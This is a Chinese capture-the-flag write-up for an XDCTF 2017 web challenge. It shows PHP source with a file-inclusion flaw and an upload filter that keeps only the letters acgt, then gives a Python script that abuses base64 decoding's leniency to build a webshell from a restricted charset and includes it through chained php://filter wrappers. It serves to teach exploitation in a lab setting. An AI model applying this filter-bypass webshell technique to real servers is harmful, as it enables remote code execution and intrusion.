首先题目存在文件包含漏洞 , 可以通过 :
php://filter/convert.base64-encode/resource=index.php
读取到目标服务器源码
例如 :
// page.php
<?php
error_reporting(0);
@$file = $_GET["file"];
if(isset($file))
{
if (preg_match('/data|input|read/i', $file) || strstr($file,"../") !== FALSE )
{
echo "<p> error! </p>";
}
else
{
include($file);
}
}
?>
// upload.php
<?php
error_reporting(0);
session_start();
if (isset($_FILES[file]) && $_FILES[file]['size'] < 4 ** 8) {
$d = "./tmp/" . md5(session_id());
@mkdir($d);
$b = "$d/" . pathinfo($_FILES[file][name], 8);
file_put_contents($b, preg_replace('/[^acgt]/is', '', file_get_contents($_FILES[file][tmp . "_name"])));
echo $b;
}
?>
可以看到 upload.php 的上传的规则 :
将上传的文件中非 acgtACGT 的所有字符替换为空
然后再保存
那么也就是说我们上传的文件中只能允许 acgtACGT 这四个字符通过
和大佬讨论过之后得到了一个思路
那就是用 acgtACGT 这八个字符拼凑成 webshell
然后利用
php://filter/convert.base64-decode/resource=./tmp/upload_file
来包含上传的文件
但是这里存在一个问题
只有 8 个字符 , 如何才能扩充到用来表示 base64 的 64 个字符呢 ?
这里利用到 base64 的解码函数的一个小 trick
解码函数为了提高自己的容错性
如果参数中有非法字符 (不在 base64 的 64 个字符范围内的) 就会跳过
那么这就给了我们利用的机会
image.png
我们可以用 acgtACGT 求四个字符的全排列
然后将其解码
得到的明文中必然会出现新的字符 (包括不可见字符以及 base64 合法的字符)
这样相当于之前只允许我们输入的 agctACGT 这个字符集又被扩充了
然后我们就可以重复这个过程
例如 :
image.png
image.png
根据这个原理 , 我们就可以写出字符在允许范围之内的 webshell
例如 只由数字1234组成的 base64-encoded 的 webshell :
// 代码过长简书放不下 , 贴到了 gist 上 :
https://gist.github.com/WangYihang/144d39888a05ba307d6356c9e9fc80c6
附上 生成这种 webshell 的脚本
https://gist.github.com/WangYihang/a49c663237e68822dd4816e99534ca72
录了一个小视频 :
asciicast
#!/usr/bin/env python
# encoding:utf-8
# Author : WangYihang
# Date : 2017/10/03
# Email : wangyihanger@gmail.com
# Comment : to solve XDCTF-2017-WEB-Upload
import string
import itertools
import os
base64_chars = string.letters + string.digits + "+/"
def robust_base64_decode(data):
robust_data = ""
base64_charset = string.letters + string.digits + "+/"
for i in data:
if i in base64_charset:
robust_data += i
robust_data += "=" * (4 - len(robust_data) % 4)
return robust_data.decode("base64").replace("\n", "")
def robust_base64_encode(data):
return data.encode("base64").replace("\n", "").replace("=", "")
def enmu_table(allow_chars):
possible = list(itertools.product(allow_chars, repeat=4))
table = {}
for list_data in possible:
data = "".join(list_data)
decoded_data = data.decode("base64")
counter = 0
t = 0
for x in decoded_data:
if x in base64_chars:
counter += 1
t = x
if counter == 1:
table[t] = data
return table
def generate_cipher(tables, data):
encoded = robust_base64_encode(data)
result = encoded
for d in tables[::-1]:
encoded = result
result = ""
for i in encoded:
result += d[i]
return result
def enmu_tables(allow_chars):
filename = "".join(allow_chars)
tables = []
saved_length = 0
flag = True
while True:
table = enmu_table(allow_chars)
length = len(table.keys())
if saved_length == length:
flag = False
break
saved_length = length
# print "[+] %d => %s" % (length, table)
print "[+] Got %d chars : %s" % (length, table.keys())
tables.append(table)
allow_chars = table.keys()
if set(table.keys()) >= set(base64_chars):
break
if flag:
return tables
return False
def main():
data = "<?php echo 'Hacked By Lilac!';?>"
print "[+] Base64 chars : %s" % (base64_chars)
print "[+] Plain : %s" % (data)
chars = "a0"
print "[+] Start charset : [%s]" % (chars)
filename = chars
print "[+] Generating tables..."
tables = enmu_tables(set(chars))
if tables:
print "[+] Trying to encode data..."
cipher = generate_cipher(tables, data)
with open(filename, "w") as f:
f.write(cipher)
print "[+] The encoded data is saved to file (%d Bytes) : %s" % (len(cipher), filename)
command = "php -r 'include(\"" + "php://filter/convert.base64-decode/resource=" * (
len(tables) + 1) + "%s\");'" % (filename)
print "[+] Usage : %s" % (command)
print "[+] Executing..."
os.system(command)
else:
print "[-] Failed : %s" % (tables)
if __name__ == "__main__":
main()
网友评论
Base64_Decode 的时候 , 可以这么理解 , 首先会把要解码的字符串中所有不是 Base64 合法字符删除掉
然后再进行替换 , 这样就可以利用 acgt 的排列组合解码构造出所有合法的 Base64 字符 , 然后就可以编码任意数据了